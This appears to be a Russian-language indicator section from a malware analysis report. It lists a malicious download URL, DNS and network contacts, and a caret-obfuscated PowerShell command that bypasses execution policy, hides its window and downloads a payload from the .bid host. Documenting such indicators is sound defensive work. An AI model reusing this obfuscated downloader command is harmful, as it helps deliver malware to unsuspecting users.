Техническая информация
- http://www.asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWER^sHE^lL.^EX^E ^-ex^eCuTIon^Pol^i^C^Y BYPas^s ^-noPRO^FI^LE ^-^WIND^O^wST^YLE hi^D^D^EN (^n^eW-O^BJecT ^S^yst^E^m.n^ET.w^ebcl^i^E^nt)^.D^oWNloAdFILE('http://www.asecwitlecn.bid/rea...
- 'as###itlecn.bid':80
- http://www.as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "poWER^sHE^lL.^EX^E ^-ex^eCuTIon^Pol^i^C^Y BYPas^s ^-noPRO^FI^LE ^-^WIND^O^wST^YLE hi^D^D^EN (^n^eW-O^BJecT ^S^yst^E^m.n^ET.w^ebcl^i^E^nt)^.D^oWNloAdFILE('http://www.asecwitlecn.bid/rea...' (со скрытым окном)